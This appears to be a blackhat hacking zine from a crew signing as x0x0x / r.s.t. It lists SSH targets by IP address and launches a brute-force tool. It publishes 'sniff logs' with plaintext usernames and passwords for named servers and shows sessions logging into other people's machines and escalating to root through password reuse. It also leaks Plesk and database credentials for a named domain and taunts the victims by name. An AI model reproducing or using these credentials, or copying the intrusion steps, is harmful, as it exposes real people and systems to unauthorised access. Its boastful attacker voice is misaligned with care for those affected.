oracle@80.250.178.89 ssh oracle@80.249.110.130 ssh oracle@80.190.230.26 ssh oracle@82.102.93.4 ssh oracle@80.65.128.175 ssh oracle@82.147.130.245 ssh oracle@80.65.128.175 ssh oracle@82.102.93.4 ssh oracle@80.190.230.26 ssh oracle@80.249.110.130 bash# nohup ./brute list >> /dev/null & l0000000000lll ((((((((((((((( OKAY I WILL PASTE NOW SOME SNIFF LOGS )))))))))))))))))))))) #COOL CORPORATION OF EFNET GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOD 66.109.20.52/corp.efnet.net (stevoo:1qaz,2wsx) (venial:n1gg0rv3n) - FreeBSD corp.efnet.net 6.3-STABLE FreeBSD 6.3-STABLE #0: Fri Feb 8 21:24:16 UTC 2008 root@corp.efnet.net:/usr/obj/usr/src/sys/corp i386 | cat /home/venial/psybnc/lang/french.lng 72.20.13.30/box.observers.net (venial:n1gg0rv3n) (coldfyre:qksq90a) - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 root@box.observers.net:/usr/obj/usr/src/sys/obs i386 85.24.148.29/evilbsd.com (venial:n1gg0rv3n) - FreeBSD epic.xzibition.com 5.4-RELEASE-p16 FreeBSD 5.4-RELEASE-p16 #1: Sat Jun 17 00:03:34 CEST 2006 root@epic.outlandz.net:/usr/obj/usr/src/sys/EPIC i386 i386 Intel(R) Pentium(R) 4 CPU 3.00GHz FreeBSD 72.20.48.65/echo.xzibition.com (venial:n1gg0rv3n) - FreeBSD echo.xzibition.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #1: Fri Nov 3 23:59:29 UTC 2006 root@echo.outlandz.net:/usr/obj/usr/src/sys/ECHO i386 212.71.19.102/users.geekshells.org (venial:n1gg0rv3n) - FreeBSD spark.ofloo.net 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #11: Sun Feb 17 13:18:10 CET 2008 ofloo@spark.ofloo.net:/usr/obj/usr/src/sys/OFL i386 & THKX VENIAL********************* [root@x0x0x ~]# ssh accord.lyms.org -l smyl smyl@accord.lyms.org's password: ^(x187 Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ sudo su root Password: xxxxxx bash# uname -a FreeBSD accord.lyms.org 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #0: Fri Jun 15 11:27:14 PDT 2007 root@accord.lyms.org:/usr/obj/usr/src/sys/FOO i386 bash# exit @#@#@###@#@ smyl you are really expert... making password of nsdfix.accesshost.us same as accord.lyms.org!! thks very much!!@#@@#@#@##@#@# [root@x0x0x ~]# ssh nsdfix.accesshost.us -l smyl smyl@nsdfix.accesshost.us's password: ^(x187 Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ sudo su root Password: xxxxxx bash# uname -a Linux nsdfix.accesshost.us 2.6.18-6-486 #1 Sun Feb 10 22:06:33 UTC 2008 i686 GNU/Linux bash# exit #@#@#@##@ OKAY... dont try change ur password!! i will hack again... [root@x0x0x ~]# ssh 64.18.144.130 -l smyl smyl@64.18.144.130 's password: ^(x187 Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ sudo su root Password: xxxxxx // (dak- owned ?) bash# cat /etc/passwd|grep dak|wc -l 1 bash# uname -a FreeBSD rock.accessshells.us 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 18 20:45:44 EDT 2007 root@rock.accessshells.us:/usr/obj/usr/src/sys/LSD i386 bash# exit ;;;;;;;........... ___ ___ / \____/ \ NO WOMAN / / __ \ \ NO BALLS / | .. | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | HF 'ooo' 'ooo''ooo' cat somesniff_log; the domain for dev: dredgemedia.org, un: dredgemediaorg pass: g3u5nonwrp plesk login: https://dredgemedia.org:8443 db name: pu username: dredge_pu_dev pass: ip35jrt24 .......................(dont worry, be happy!) l0l staring on x0x0x2; ----------- ´ ` ´ - monstershells ´ ´ ´ phisher1 ´ o ´ | | / \ hub.us.quakenet.org __ *webguidepartner.com |- efnet - / \ ---´ sonny ´ ´ / \ ´ ----´ dukat+------- -------+stevoo efnet.port80.se´ \ \union/ / `---´ / / \ \ venial+----- -----+smyl/dak some shells `- `---´ `some shells / / .'<_.-._.'< / \ .^. ._ | -+- -+- | (_|_) r- |\ \ / / // /\ \\ : \ -=- / \\ `. \\.' ___.__`..;._.-'---... // ``\\ __.--" `;' __ `-. /\\.--"" __., ""-. ". ;=r __.---" | `__ __' / .' .' '=/\\"" \ .' .' \\ | __ __ / | \\ | -- -- //`'`' \\ | -- -- ' | // \\ | . |// r.s.t. ~> messages (*) stevoo - Open your eyes is a good way to avoid punches! (see stevoo picture, to understand this, LOL) (*) phisher1 - You are easy! think this. learn more www.linux.org/lessons/. (*) smyl - Teach about security lol http://apex.vtc.com/linux-security.php. (*) venial - We like you, but don´t be kiddie. (*) dubkat - You are 100% pwned, keed quiet. (*) ik - Do not be shown. We wont make fun about you. (*) misery - As you asked, your nick dont be here! Do not make to be :) ! (*) dtr - NEXT TARGET! (*) dmer [at] brlink - Open your eyes. (*) ? - Don´t keep in us way. *'no much patience to do this zine'* ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ thkx to #soldiers @ efnet ^^^^^^^ ^^^^^^^ g. and ^^^^^^^ ^^^^^^^ all blackhats! ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ # x0x0x r. - s. - t. # # wanna send us a message? x0x0xcr3w [at] gmail [dot] com # # EOF